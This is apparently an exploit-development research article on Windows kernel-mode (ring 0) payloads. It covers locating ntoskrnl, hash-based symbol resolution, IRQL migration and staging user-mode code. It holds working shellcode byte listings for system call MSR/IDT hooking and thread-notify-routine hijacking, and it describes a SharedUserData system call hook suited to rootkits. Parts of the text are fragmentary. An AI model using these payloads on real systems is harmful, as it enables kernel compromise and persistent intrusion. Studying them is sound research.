Uninformed V3a4 PDF
bugcheck skape
Contents
1 Foreword
2 Introduction
3 General Techniques
3.1 Finding Ntoskrnl.exe Base Address
3.1.1 IDT Scandown
3.1.2 KPRCB IdleThread Scandown
3.1.3 SYSENTER_EIP_MSR Scandown
3.1.4 Known Portable Base Scandown
3.2 Resolving Symbols
4 Payload Components
4.1 Migration
4.1.1 Direct IRQL Adjustment
4.1.2 System Call MSR/IDT Hooking
4.1.3 Thread Notify Routine
4.1.4 Hooking Object Type Initializer Procedures
4.1.5 Hooking KfRaiseIrql
4.2 Stagers
4.2.1 System Call Return Address Overwrite
4.2.2 Thread APC
4.2.3 User-mode Function Pointer Hook
4.2.4 SharedUserData SystemCall Hook
4.3 Recovery
4.3.1 Thread Spinning
4.3.2 Throwing an Exception
4.3.3 Thread Restart
4.3.4 Lock Release
4.4 Stages
5 Conclusion
Chapter 1
Foreword
Chapter 2
Introduction
major distinction between kernel-mode and user-mode payloads, however, is that
kernel-mode payloads are burdened with some extra considerations that are not
found in user-mode payloads, and for that reason are broken down into a few
more distinct payload components. These extra components will be discussed
at length in chapter 4.
The purpose of this document is to provide the reader with a point of reference
for the major aspects common to almost all kernel-mode payloads. To simplify
terminology, kernel-mode payloads will be referred to throughout the document
as R0 payloads, short for ring 0, which symbolizes the processor ring that kernel-
mode operates at on x86. For the same reason, user-mode payloads will be
referred to throughout the document as R3 payloads, short for ring 3. To fully
understand this paper, the reader should have a basic understanding of Windows
kernel-mode programming.
In order to limit the scope of this document, the methods that can be used
to achieve code execution through different vulnerability scenarios will not be
discussed at length. The main reason for this is that general approaches to
payload implementation are typically independent of the vulnerability for which
they are used. However, references to some of the research in this area can
be found in the bibliography for readers who might be curious[4]. Furthermore,
this document will not expand upon some of the interesting things that can be
done in the context of a kernel-mode payload, such as keyboard sniffing. Instead,
the topic of advanced kernel-mode payloads will be left for future research. The
authors hope that by describing the various elements that will compose almost all
kernel-mode payloads, the process involved in implementing some of the more
interesting parts will be made easier.
With all of the formalities out of the way, the first leap to take is one regarding
an understanding of some of the general techniques that can be applied to
kernel-mode payloads, and it’s there that the journey begins.
Chapter 3
General Techniques
This chapter will outline some of the techniques and algorithms that are gener-
ally applicable to most kernel-mode payloads. For example, kernel-mode pay-
loads may find it necessary to resolve certain exported symbols for use within
the payload itself, much as user-mode payloads do.
to indicate a direction
be a great way to save space.
Another thing to keep in mind with some of these implementations is that they
may fail if the /3GB boot flag is specified. This is not generally very common,
but it could be something that is encountered in the real world.
3.1.1 IDT Scandown
Size: 17 bytes
Compat: All
Credit: eEye
The approach for finding the base address of nt discussed in eEye’s paper
involved finding the high-order word of an IDT handler that was set to a symbol
somewhere inside nt. After acquiring the symbol address, the payload simply
walked down toward lower addresses in memory byte-by-byte until it found the
MZ signature. The following disassembly shows the approach taken to do this[2]:
This approach is perfectly fine; however, it could be prone to error if the four
signature bytes were found somewhere within nt at a location that did not
actually coincide with its base address. This issue is present in any scandown
technique (referred to as “mid-deltas” by eEye). Scanning down byte-by-byte
can be seen as potentially more error prone, but this is purely conjecture at this
point, as the authors are aware of no specific cases in which it would fail. It may
also fail if the direction flag is not cleared, though the chances of this happening
are minimal. One other limiting factor may be the presence of the NULL byte
in the comparison. It is possible to slightly improve this approach (depending
on one’s perspective) by scanning downward one page at a time and by
eliminating the need to clear the direction flag (footnote 2). This
also eliminates the presence of NULL bytes. However, some of these changes
lead to the code being slightly larger (20 bytes total):
0000000D 48 dec eax
0000000E 6681384D5A cmp word [eax],0x5a4d
00000013 75F4 jnz 0x9
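The page-at-a-time search can be modelled outside the kernel. The following Python sketch is only an illustration of the search logic, not payload code: it treats a region of memory as a byte buffer and steps down one page at a time from an address assumed to lie inside the image until a page begins with the two-byte MZ signature. The 4 KB page size, the example addresses, and the names scandown and PAGE_SIZE are assumptions made for the example.

```python
PAGE_SIZE = 0x1000  # assumed x86 page size


def scandown(memory: bytes, region_base: int, start: int) -> int:
    """Return the first page at or below `start` that begins with b"MZ".

    `memory` models the bytes mapped at `region_base`; both are hypothetical
    stand-ins for kernel address space.
    """
    addr = start & ~(PAGE_SIZE - 1)          # round down to a page boundary
    while addr >= region_base:
        off = addr - region_base
        if memory[off:off + 2] == b"MZ":     # same test as cmp word [eax],0x5a4d
            return addr
        addr -= PAGE_SIZE                    # step down one page
    raise LookupError("no MZ signature found in the modelled region")


# Hypothetical layout: an image based at 0x804d7000 inside an 8-page region.
region_base = 0x804D5000
image_base = 0x804D7000
memory = bytearray(PAGE_SIZE * 8)
memory[image_base - region_base:image_base - region_base + 2] = b"MZ"
# A stray "MZ" that is not page aligned is never examined by this scan.
memory[0x4123:0x4125] = b"MZ"

found = scandown(bytes(memory), region_base, 0x804DB4A0)
```

Because only page boundaries are examined, a signature that happens to appear in the middle of a page cannot produce a false match, which is one way to view the trade-off against the byte-by-byte scan.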
3.1.2 KPRCB IdleThread Scandown
Size: 17 bytes
Compat: All
The base address of nt can also be found by looking at the IdleThread attribute
of the KPRCB for the current KPCR. As it stands, this attribute always appears to
point to a global variable inside of nt. Just like the IDT scandown approach,
this technique uses the symbol as a starting point to walk down and find the
base address of nt by looking for the MZ signature. The following disassembly
shows how this is accomplished:
This approach will fail if it happens that the IdleThread attribute does not
point somewhere within nt, but thus far a scenario such as this has not been
observed. It would also fail if the Kprcb attribute was not found immediately
after the Kpcr, but this has not been observed in testing.
3.1.3 SYSENTER_EIP_MSR Scandown
Size: 19 bytes
Compat: XP, 2003 (modern processors only)
For processors that support the system call MSR 0x176 (SYSENTER_EIP_MSR),
the base address of nt can be found by reading the registered system call handler
and then using the scandown technique to find the base address. The following
disassembly illustrates how this can be accomplished:
3.1.4 Known Portable Base Scandown
Size: 17 bytes
Compat: 2000, XP, 2003 SP0
A quick sampling of base addresses across different major releases shows that the
base address of nt is always within a certain range. The one exception to this
in the polling was Windows 2003 Server SP1, and for that reason this payload
is not compatible. The basic idea is to simply use an offset that is known to
reside within the region that nt will be mapped at on different operating system
versions. The table below describes the mapping ranges for nt on a few different
samplings:
As can be seen from the table, the address 0x8050babe resides within every
region that nt could be mapped at except for Windows 2003 Server SP1. The
payload below implements this approach:
3.2 Resolving Symbols
Size: 67 bytes
Compat: All
Another aspect common to almost all payloads on Windows is the use of code
that walks the export directory of an image to resolve the address of a symbol (footnote 3).
In the kernel, things aren’t much different. Barnaby refers to the use of a
two-byte XOR/ROR hash in the eEye paper. Alternatively, a four-byte hash could
be used, but as pointed out in the eEye paper, this leads to a waste of space
when a two-byte hash could suffice equally well provided there are no collisions.
3 The technique of walking the export directory to resolve symbols has been used for ages,
The approach implemented below involves passing a two-byte hash in the ebx
register (the high order bytes do not matter) and the base address of the image
to resolve against in the ebp register. In order to save space, the code below is
designed in such a way that it will transfer execution into the function after it
resolves it, thus making it possible to resolve and call the function in one step
without having to cache addresses. In most cases, this leads to a size efficiency
increase.
00000000 60 pusha
00000001 31C9 xor ecx,ecx
00000003 8B7D3C mov edi,[ebp+0x3c]
00000006 8B7C3D78 mov edi,[ebp+edi+0x78]
0000000A 01EF add edi,ebp
0000000C 8B5720 mov edx,[edi+0x20]
0000000F 01EA add edx,ebp
00000011 8B348A mov esi,[edx+ecx*4]
00000014 01EE add esi,ebp
00000016 31C0 xor eax,eax
00000018 99 cdq
00000019 AC lodsb
0000001A C1CA0D ror edx,0xd
0000001D 01C2 add edx,eax
0000001F 84C0 test al,al
00000021 75F6 jnz 0x19
00000023 41 inc ecx
00000024 6639DA cmp dx,bx
00000027 75E3 jnz 0xc
00000029 49 dec ecx
0000002A 8B5F24 mov ebx,[edi+0x24]
0000002D 01EB add ebx,ebp
0000002F 668B0C4B mov cx,[ebx+ecx*2]
00000033 8B5F1C mov ebx,[edi+0x1c]
00000036 01EB add ebx,ebp
00000038 8B048B mov eax,[ebx+ecx*4]
0000003B 01E8 add eax,ebp
0000003D 8944241C mov [esp+0x1c],eax
00000041 61 popa
00000042 FFE0 jmp eax
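The constants in the listing are offsets into the PE headers: 0x3c is e_lfanew in the DOS header, 0x78 past the NT headers is the export directory RVA of a 32-bit image, and 0x20, 0x24 and 0x1c inside the export directory are AddressOfNames, AddressOfNameOrdinals and AddressOfFunctions. The Python sketch below walks the same fields over a tiny synthetic image. It is an illustration under stated assumptions rather than a port of the payload: the image contents, the helper names, the comparison by name instead of by hash, and the NumberOfNames bound (which the listing omits) are all introduced here for clarity.

```python
import struct


def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]


def u16(img, off):
    return struct.unpack_from("<H", img, off)[0]


def cstr(img, off):
    return bytes(img[off:img.index(b"\x00", off)])


def resolve_export(img, wanted):
    """Return the RVA of export `wanted`, or None (RVAs index `img` directly)."""
    nt = u32(img, 0x3C)               # IMAGE_DOS_HEADER.e_lfanew
    exp = u32(img, nt + 0x78)         # export directory RVA (PE32 layout)
    count = u32(img, exp + 0x18)      # NumberOfNames (not checked by the listing)
    funcs = u32(img, exp + 0x1C)      # AddressOfFunctions
    names = u32(img, exp + 0x20)      # AddressOfNames
    ords = u32(img, exp + 0x24)       # AddressOfNameOrdinals
    for i in range(count):
        if cstr(img, u32(img, names + 4 * i)) == wanted:
            ordinal = u16(img, ords + 2 * i)      # name index -> function index
            return u32(img, funcs + 4 * ordinal)
    return None


def build_image():
    """Build a hypothetical, minimal image holding only the fields read above."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)            # e_lfanew
    img[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<I", img, 0x80 + 0x78, 0x200)    # export directory RVA
    struct.pack_into("<I", img, 0x200 + 0x18, 2)       # NumberOfNames
    struct.pack_into("<I", img, 0x200 + 0x1C, 0x240)   # AddressOfFunctions
    struct.pack_into("<I", img, 0x200 + 0x20, 0x250)   # AddressOfNames
    struct.pack_into("<I", img, 0x200 + 0x24, 0x260)   # AddressOfNameOrdinals
    struct.pack_into("<III", img, 0x240, 0x1000, 0x2000, 0x3000)
    struct.pack_into("<II", img, 0x250, 0x280, 0x290)
    struct.pack_into("<HH", img, 0x260, 2, 0)
    img[0x280:0x286] = b"Alpha\x00"
    img[0x290:0x295] = b"Beta\x00"
    return img


image = build_image()
alpha_rva = resolve_export(image, b"Alpha")
```

The two-level lookup is the part that is easy to get wrong: the index of the matching name selects an entry in the ordinal array, and that ordinal, not the name index, selects the function RVA.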
To understand how this function works, take for example the resolution of
nt!ExAllocatePool. First, a hash of the string “ExAllocatePool” must be
obtained using the same algorithm that the payload uses. For this payload,
the result is 0x0311b83f (footnote 4). Since the implementation uses a two-byte hash,
only 0xb83f is needed. This hash is then stored in the bx register. Since
ExAllocatePool is found within nt, the base address of nt must be passed in
the ebp register. Finally, in order to perform the resolution, the arguments to
nt!ExAllocatePool must be pushed onto the stack prior to calling the reso-
lution routine. This is because the resolution routine will transfer control into
nt!ExAllocatePool after the resolution succeeds and therefore must have the
proper arguments on the stack.
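The hash can also be reproduced with a few lines of Python. This sketch follows the loop in the listing (rotate right by 13, add the next byte, and include the terminating NUL in the loop); the function names ror32 and export_hash are chosen here for illustration and are not part of any existing tool.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def export_hash(name: bytes) -> int:
    """Hash an export name the way the resolver loop does."""
    h = 0
    for byte in name + b"\x00":        # the loop also processes the NUL byte
        h = ror32(h, 13)               # ror edx,0xd
        h = (h + byte) & 0xFFFFFFFF    # add edx,eax
    return h


full_hash = export_hash(b"ExAllocatePool")
short_hash = full_hash & 0xFFFF        # only the low word is compared (cmp dx,bx)
print(f"{full_hash:#010x} {short_hash:#06x}")   # prints 0x0311b83f 0xb83f
```

Since only 16 bits are compared and the listing stops at the first match, it is worth checking a chosen hash against the full export list of the target image for collisions before relying on it.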
4 This was calculated by doing perl -Ilib -MPex::Utils -e 'printf "%.8x",
Pex::Utils::Ror(Pex::Utils::RorHash("ExAllocatePool"), 13);'
One downside to this implementation is that it won’t support the resolution of
data exports (since it tries to jump into them). However, for such a purpose, the
routine could be modified to simply not issue the jmp instruction and instead
rely on the caller to execute it. It is also important for payloads that use this
resolution technique to clear the direction flag with cld.
Chapter 4
Payload Components
This chapter will outline four distinct components that can be used in con-
junction with one another to produce a logical kernel-mode payload. Unlike
user-mode vulnerabilities, kernel-mode vulnerabilities tend to be a bit more in-
volved when it comes to considerations that must be made when attempting
to execute code after successfully exploiting a target. These concerns include
things like IRQL considerations, setting up code for execution, gracefully con-
tinuing execution, and what action to actually perform. Some of these steps
have parallels to user-mode payloads, but others do not.
The first consideration that must be made when implementing a kernel-mode
payload is whether or not the IRQL that the payload will be running at is a
concern. For instance, if the payload will be making use of functions that require
the processor to be running at PASSIVE_LEVEL, then it may be necessary to
ensure that the processor is transitioned to a safe IRQL. This consideration is
also dependent on the vulnerability in question as to whether or not the IRQL
will even be a problem. For scenarios where it is a problem, a migration payload
component can be used to ensure that the code that requires a specific IRQL is
executed in a safe manner.
The second consideration involves staging either an R3 payload (or secondary
R0 payload) to another location for execution. This payload component is
encapsulated by a stager which has parallels to payload stagers found in typical
user-mode payloads. Unlike user-mode payloads, though, kernel-mode stagers
are typically designed to execute code in another context, such as in a user-
mode process or in another kernel-mode thread context. As such, stagers may
sometimes overlap with the purpose of the migration component, such as when
the act of staging leads to the stage executing at a safe IRQL, and can therefore
be considered a superset of a migration component in that case.
The third consideration has to do with how the payload gracefully restores
execution after it has completed. This portion of a kernel-mode payload is
classified as the recovery component. In short, the recovery component of a
payload finds a way to make sure that the kernel does not crash or otherwise
become unusable. If the kernel were to crash, any code that the payload had
intended to execute may not actually get a chance to run depending on how the
payload is structured. As such, recovery is one of the most volatile and critical
aspects of a kernel-mode payload.
Finally, and most importantly, the fourth component of a kernel-mode payload
is the stage component. It is this component that actually performs the real
work of the payload. For instance, a stage component might detect that it’s
running in the context of lsass.exe and create a reverse shell in user-mode.
As another example of a stage component, eEye demonstrated a keyboard hook
that sent keystrokes back in ICMP echo responses from the host[2]. Stages have
a very broad definition.
The following sections will explain each one of the four payload components in
detail and offer techniques and implementations that can be used under certain
situations.
4.1 Migration
This is important because the IRQL that the processor will be
running at when a kernel-mode vulnerability is triggered is highly dependent
upon the area in which the vulnerability occurs. For this reason, it may be
generally necessary to have an approach for either directly or indirectly lowering
the IRQL in such a way that permits the use of some of the common driver
support routines. As an example, it is not possible to call nt!KeInsertQueueApc
at an IRQL greater than PASSIVE_LEVEL.
This section will focus on describing methods that could be used to implement
migration payloads. The purpose of a migration payload is to migrate the
processor to an IRQL that will allow payloads to make use of pageable memory
and common driver support routines as described above. The techniques that
can be used to do this vary in terms of stability and simplicity. It’s generally a
matter of picking the right one for the job.
One concern about taking this approach over calling hal!KeLowerIrql is that
the soft-interrupt handlers associated with interrupts that were masked while at
a raised IRQL will not be called. It is unclear whether or not this could lead to
a deadlock, but it is theorized that the answer could be yes. However, the authors
did test writing a driver that raised to HIGH_LEVEL, spun for a period of time
(during which keyboard and mouse interrupts were sent), and then manually
adjusted the IRQL as described above. There appeared to be no adverse side
effects, but it has not been ruled out that a deadlock could be possible (footnote 2).
Aside from the risks, this approach is nice because it is very small (6 bytes).
Assuming there are no significant problems with it, the use of this method
would be a no-brainer given the right set of circumstances for a vulnerability.
1 In kernel-mode, the fs segment points to the current processor’s KPCR structure
2 Consequently, if anyone knows a definitive answer to this, the authors would love to hear
it
4.1.2 System Call MSR/IDT Hooking
placing the symbolic code of 0x176 in ecx and using the rdmsr instruction.
The existing value will be returned in edx:eax. If the IDT entry
at index 0x2e is to be hooked, it can be retrieved by first obtaining the
processor’s IDT base using the sidt instruction. The entry can then be
located at offset 0x170 (0x2e * 8) relative to the base, since the IDT is an
array of 8-byte KIDTENTRY structures. Lastly, the address of the code that
services the interrupt is stored in the KIDTENTRY, with the low word at Offset
and the high word at ExtendedOffset. The following is the definition of KIDTENTRY.
kd> dt _KIDTENTRY
+0x000 Offset : Uint2B
+0x002 Selector : Uint2B
+0x004 Access : Uint2B
+0x006 ExtendedOffset : Uint2B
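To make the layout concrete, the following Python sketch packs and unpacks an 8-byte entry with the four fields shown above and derives the offset of vector 0x2e within the table. The sample field values are hypothetical and the helper names are introduced for the example; only the structure layout and the 0x170 offset come from the text.

```python
import struct

KIDTENTRY_SIZE = 8      # four Uint2B fields
SYSCALL_VECTOR = 0x2E


def idt_entry_offset(vector: int) -> int:
    """Byte offset of an interrupt vector's entry from the IDT base."""
    return vector * KIDTENTRY_SIZE


def handler_address(entry: bytes) -> int:
    """Combine Offset (low word) and ExtendedOffset (high word)."""
    offset, _selector, _access, extended = struct.unpack("<HHHH", entry)
    return (extended << 16) | offset


def set_handler(entry: bytes, address: int) -> bytes:
    """Return a copy of the entry pointing at `address`, other fields unchanged."""
    _offset, selector, access, _extended = struct.unpack("<HHHH", entry)
    return struct.pack("<HHHH", address & 0xFFFF, selector, access, address >> 16)


# Hypothetical entry contents, chosen only to exercise the helpers.
entry = struct.pack("<HHHH", 0x2A31, 0x0008, 0xEE00, 0x8053)
original = handler_address(entry)
hooked = set_handler(entry, 0xFFDFFD84)
```

Here original evaluates to 0x80532a31. Splitting the new address across the two word fields mirrors the pair of 16-bit stores to [ecx] and [ecx+0x6] in the payload listing that follows.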
00000000 FC cld
00000001 BF80FDDFFF mov edi,0xffdffd80
00000006 57 push edi
00000007 6A76 push byte +0x76
00000009 58 pop eax
0000000A FEC4 inc ah
0000000C 99 cdq
0000000D 91 xchg eax,ecx
0000000E 89F8 mov eax,edi
00000010 66B87002 mov ax,0x270
00000014 3910 cmp [eax],edx
00000016 EB06 jmp short 0x1e
00000018 50 push eax
00000019 0F32 rdmsr
0000001B AB stosd
0000001C EB3E jmp short 0x5c
0000001E 648B4238 mov eax,[fs:edx+0x38]
00000022 8D4408FA lea eax,[eax+ecx-0x6]
00000026 50 push eax
00000027 91 xchg eax,ecx
00000028 8B4104 mov eax,[ecx+0x4]
0000002B 668B01 mov ax,[ecx]
0000002E AB stosd
0000002F EB2B jmp short 0x5c
00000031 5E pop esi
00000032 6A01 push byte +0x1
00000034 59 pop ecx
00000035 F3A5 rep movsd
00000037 B8FF2580FD mov eax,0xfd8025ff
0000003C AB stosd
0000003D 66C707DFFF mov word [edi],0xffdf
00000042 59 pop ecx
00000043 58 pop eax
00000044 0404 add al,0x4
00000046 85C9 test ecx,ecx
00000048 9C pushf
00000049 FA cli
0000004A 668901 mov [ecx],ax
0000004D C1E810 shr eax,0x10
00000050 66894106 mov [ecx+0x6],ax
00000054 9D popf
00000055 EB04 jmp short 0x5b
00000057 31D2 xor edx,edx
00000059 0F30 wrmsr
0000005B C3 ret ; replace with recovery method
0000005C E8D0FFFFFF call 0x31
involves setting up a thread notify routine, which is normally done by calling
nt!PsSetCreateThreadNotifyRoutine. Unfortunately, the documentation
states that this routine can only be called at PASSIVE_LEVEL, thus making it
appear as if calling it from a payload would lead to problems. While this is
true, it is also possible to manually create a notify routine by modifying the
global array of thread notify routines. Although this array is not exported,
it is easy to find by extracting an address reference to it from either
nt!PsSetCreateThreadNotifyRoutine or nt!PsRemoveCreateThreadNotifyRoutine.
By using this basic approach, it is possible to write a migration payload that
transitions to PASSIVE_LEVEL by registering a callback that is called whenever
a thread is created or deleted.
In more detail, a few steps must be taken in order to get this to work properly
on 2000 and XP. The steps taken on 2003 should be pretty much the same as
XP, but have not been tested.
5. If the payload is running on 2000
On 2000, the nt!PspCreateThreadNotifyRoutine is just an array of func-
tion pointers. For that reason, registering the notify routine is much sim-
pler and can actually be done by calling nt!PsSetCreateThreadNotifyRoutine
without much of a concern since no extra memory is allocated. By call-
ing the real exported routine directly, it is not necessary to manually
increment the nt!PspCreateThreadNotifyRoutineCount. Furthermore,
doing so would not be as easy as it is on XP because the count variable is
located quite a distance away from the array itself.
6. Resolve the exported symbol
The symbol resolution approach taken in this payload involves compar-
ing part of an exported symbol’s name with “dNot”. This is done be-
cause on XP, the actual symbol needed in order to extract the address of
nt!PspCreateThreadNotifyRoutine is found a few bytes into
nt!PsRemoveCreateThreadNotifyRoutine. However, on 2000, the ad-
dress of nt!PsSetCreateThreadNotifyRoutine needs to be resolved as
it is going to be directly called. As such, the offset into the string that is
compared between 2000 and XP differs. For 2000, the offset is 0x10. For
XP, the offset is 0x13. The end result of the resolution process is that if
the payload is running on XP, the eax register will hold the address of
nt!PsRemoveCreateThreadNotifyRoutine and if it’s running on 2000 it
will hold the address of nt!PsSetCreateThreadNotifyRoutine.
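The partial-name comparison described in step 6 is easy to check offline. The Python sketch below decodes the dword that the payload compares (0x746f4e64) and tests it against a handful of export names at the two offsets given above. The list of names is a small illustrative subset rather than a full export table, and the helper name matches is an assumption of the example.

```python
import struct

# The dword compared by the payload, as it appears in memory (little-endian).
MARKER = struct.pack("<I", 0x746F4E64)   # b"dNot"


def matches(name: bytes, offset: int) -> bool:
    """True if the four bytes at `offset` in `name` equal the marker."""
    return name[offset:offset + 4] == MARKER


# Illustrative subset of export names; a real export table is much larger.
exports = [
    b"PsRemoveCreateThreadNotifyRoutine",
    b"PsSetCreateProcessNotifyRoutine",
    b"PsSetCreateThreadNotifyRoutine",
    b"PsSetLoadImageNotifyRoutine",
]

match_2000 = [n for n in exports if matches(n, 0x10)]   # offset used on 2000
match_xp = [n for n in exports if matches(n, 0x13)]     # offset used on XP
```

Within this subset each offset selects exactly one name, which is the property the payload relies on. Whether that also holds for the complete export list of a given nt build is something to verify against the target.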
A payload that implements the thread notify routine approach is shown below:
00000000 FC cld
00000001 A12CF1DFFF mov eax,[0xffdff12c]
00000006 48 dec eax
00000007 6631C0 xor ax,ax
0000000A 6681384D5A cmp word [eax],0x5a4d
0000000F 75F5 jnz 0x6
00000011 95 xchg eax,ebp
00000012 BF7002DFFF mov edi,0xffdf0270
00000017 803F01 cmp byte [edi],0x1
0000001A 66D1C7 rol di,1
0000001D 57 push edi
0000001E 750E jnz 0x2e
00000020 89F8 mov eax,edi
00000022 83C008 add eax,byte +0x8
00000025 AB stosd
00000026 AB stosd
00000027 57 push edi
00000028 6A06 push byte +0x6
0000002A 6A13 push byte +0x13
0000002C EB05 jmp short 0x33
0000002E 57 push edi
0000002F 6A81 push byte -0x7f
00000031 6A10 push byte +0x10
00000033 5A pop edx
00000034 31C9 xor ecx,ecx
00000036 8B7D3C mov edi,[ebp+0x3c]
00000039 8B7C3D78 mov edi,[ebp+edi+0x78]
0000003D 01EF add edi,ebp
0000003F 8B7720 mov esi,[edi+0x20]
00000042 01EE add esi,ebp
00000044 AD lodsd
00000045 41 inc ecx
00000046 01E8 add eax,ebp
00000048 813C10644E6F74 cmp dword [eax+edx],0x746f4e64
0000004F 75F3 jnz 0x44
00000051 49 dec ecx
00000052 8B5F24 mov ebx,[edi+0x24]
00000055 01EB add ebx,ebp
00000057 668B0C4B mov cx,[ebx+ecx*2]
0000005B 8B5F1C mov ebx,[edi+0x1c]
0000005E 01EB add ebx,ebp
00000060 8B048B mov eax,[ebx+ecx*4]
00000063 01E8 add eax,ebp
00000065 59 pop ecx
00000066 85C9 test ecx,ecx
00000068 8B1C08 mov ebx,[eax+ecx]
0000006B EB14 jmp short 0x81
0000006D 5E pop esi
0000006E 5F pop edi
0000006F 6A01 push byte +0x1
00000071 59 pop ecx
00000072 F3A5 rep movsd
00000074 7808 js 0x7e
00000076 5F pop edi
00000077 893B mov [ebx],edi
00000079 FF4320 inc dword [ebx+0x20]
0000007C EB02 jmp short 0x80
0000007E FFD0 call eax
00000080 C3 ret
00000081 E8E7FFFFFF call 0x6d
The R0 stage must keep in mind that it will be called in the context of a
callback, so in order to ensure graceful recovery the stage must issue a ret 0xc
or equivalent instruction upon completion. The R0 stage must also be capable
of being re-entered without having any adverse side effects. This approach may
also be compatible with 2003, but tests were not performed. This payload could
be made significantly smaller if it were targeted to a specific OS version. One
major benefit to this approach is that the stage will be passed arguments that
are very useful for R3 code injection, such as a ProcessId and ThreadId.
This approach has quite a few cons. First, the size of the payload alone makes
it less useful due to all the work required to just migrate to a safe IRQL. Fur-
thermore, this payload also relies on offsets that may be unreliable across new
versions of the operating system, specifically on XP. It also depends on the
pages that the notify routine array resides at being paged in at the time of the
registration. If they are not, the payload will fail if it is running at a raised
IRQL that does not permit page faults.
4.1.4 Hooking Object Type Initializer Procedures
One theoretical way that could be used to migrate to a safe IRQL would be
to hook into one of the generalized object type initializer procedures associated
with a specific object type, such as nt!PsThreadType or nt!PsProcessType (footnote 3).
The method taken to do this would be to first resolve one of the exported object
types and then alter one of the procedure attributes, such as the OpenProcedure,
to point into a buffer that contains the payload to execute. The payload could
then make a determination on whether or not it’s safe to execute based on the
current IRQL. It may also be safe, in some cases, to assume that the IRQL
will be PASSIVE_LEVEL for a given object type procedure. Matt Conover also
describes how this can be done in his Malware Profiling and Rootkit Detection
on Windows paper[1]. Thanks to Derek Soeder for suggesting this approach.
hal!KfRaiseIrql. Inside the hook routine, a check could be performed to see if
the current IRQL is passive and, if so, run the rest of the payload. However, as
Derek points out, one of the problems with this approach would center around
the method used to hook the function considering it’d be somewhat expensive
to do a detours-style preamble hook (although it’s fairly easy to disable write
protection). Still, this approach shows a good line of thinking that could be
used to get to a safe IRQL.
4.2 Stagers
payload to a globally accessible location, such as SharedUserData. Once copied,
the next step would be to hook the processor MSR for the system call instruc-
tion. The hook routine for the system call instruction would then alter the
return address of the user-mode stack when called to point to the stage’s global
address and should also make it so the stage can restore execution to the ac-
tual return address after it has completed. Once the return address has been
redirected, the actual system call can be issued. When the system call returns,
it would execute the stage. The stage, once completed, would then restore
registers, such as eax, and transfer control to the actual return address.
This approach would be very transparent and should be completely reliable. The
added benefits of being able to filter system call results make it very interesting
from a memory-resident rootkit perspective.
The approach outlined by eEye works perfectly fine and is well thought out,
and as such this subsection will merely describe ways in which it might be
possible to improve the existing implementation. One way in which it might be
optimized would be to eliminate the call to nt!PsLookupProcessByProcessId,
but as their paper points out, this would only be possible for vulnerabilities
that are triggered outside of the context of the Idle process. However, for cases
where this is not a limitation, it would be easier to extract the current thread’s
process from Kpcr->Kprcb->CurrentThread->ApcState->Process. This can
be accomplished through the following disassembly (footnote 4):
After the process has been extracted, enumeration to find a privileged system
process could be done in exactly the same manner as the paper describes (by
enumerating the ActiveProcessLinks).
Another improvement that might be made would be to use SharedUserData
as a storage location for the initialized KAPC structure rather than allocating
storage for it with nt!ExAllocatePool. This would save some space by elim-
inating the need to resolve and call nt!ExAllocatePool. While the approach
outlined in the paper describes nt!ExAllocatePool as being used to stage the
payload to an IRQL-safe buffer, it would be equally feasible to do so by using
nt!SharedUserData for storage.
4.2.4 SharedUserData SystemCall Hook
Type: R0 to R3 Stager
Size: 68 bytes
Compat: XP, 2003
Migration: Not necessary
One particularly useful approach to staging an R3 payload from R0 is to hijack
the system call dispatcher at R3. To accomplish this, one must have an
understanding of the basic mechanism through which system calls are dispatched
in user-mode. Prior to Windows XP, system calls were dispatched through the
soft-interrupt 0x2e. As such, the method described in this subsection will not
work on Windows 2000. However, starting with XP SP0, the system call
interface was changed to support using processor-specific instructions for system
calls, such as sysenter or syscall.
4 This may not be safe if the KPRCB is not located immediately after the KPCR
To support this, Microsoft added fields to the KUSER_SHARED_DATA structure,
which is symbolically known as SharedUserData, that held instructions for
issuing a system call. These instructions were placed at offset 0x300 by the kernel
and took a form like the code shown below:
To make use of this dynamic code block, each system call stub in ntdll.dll
was implemented to make a call into the instructions found at that location.
ntdll!ZwAllocateVirtualMemory:
77f7e4c3 b811000000 mov eax,0x11
77f7e4c8 ba0003fe7f mov edx,0x7ffe0300
77f7e4cd ffd2 call edx
To make use of the function pointers, each system call stub was changed to issue
an indirect call through the SystemCall function pointer:
ntdll!ZwAllocateVirtualMemory:
7c90d4de b811000000 mov eax,0x11
7c90d4e3 ba0003fe7f mov edx,0x7ffe0300
7c90d4e8 ff12 call dword ptr [edx]
The importance behind the approaches taken to issue system calls is that it
is possible to take advantage of the way in which the system call dispatching
interfaces have been implemented. These interfaces can be manipulated in a
manner that allows a payload to be staged from R0 to R3 with very little
overhead. The basic idea behind this approach is that an R3 payload is layered
in between the system call stubs and the kernel. The R3 payload then gets an
opportunity to run prior to a system call being issued within the context of an
arbitrary process.
This approach has quite a few advantages. First, the size of the staging payload
is relatively small because it requires no symbol resolution or other means of
directly scheduling the execution of code in an arbitrary or specific process. Sec-
ond, the staging mechanism is inherently IRQL-safe because SharedUserData
cannot be paged out. This benefit makes it such that a migration technique
does not have to be employed in order to get the R0 payload to a safe IRQL.
One of the disadvantages of the payload outlined below is that it relies on
SharedUserData being executable. However, it should be trivial to alter the
PTE for SharedUserData to set the execute bit if necessary, thus eliminating
the DEP concern.
Another thing to keep in mind about this stager is that the R3 payload must
be written in a manner that allows it to be re-entrant. Since the R3 payload
is layered between user-mode and kernel-mode for system call dispatching, it
can be assumed that the payload will get called many times in many different
process contexts. It is up to the R3 payload to figure out when it should do its
magic and when it should not.
The following steps outline one way in which a stager of this type could be
implemented.
The method used to layer between system call stubs and the kernel differs
between XP SP0/SP1 and XP SP2/2003 SP1. To determine whether or
not the machine is XP SP0/SP1, a comparison can be made to see if
the first two bytes found at 0xffdf0300 are equal to 0xd48b (which is
equivalent to a mov edx, esp instruction). If they are equal, then the
operating system is assumed to be XP SP0/SP1. Otherwise, it is assumed
to be XP SP2+.
4. Hooking on XP SP0/SP1
If the operating system version is XP SP0/SP1, hooking is accomplished
by overwriting the first two bytes at 0xffdf0300 with a short jump in-
struction to some offset within SharedUserData that is not used, such
as 0xffdf037c. Prior to doing this overwrite, a few instructions must
be appended to the copied R3 payload that act as a method of restoring
execution so that the original system call actually executes. This is
accomplished by appending a mov edx, esp / mov ecx, 0x7ffe0302 / jmp
ecx instruction sequence.
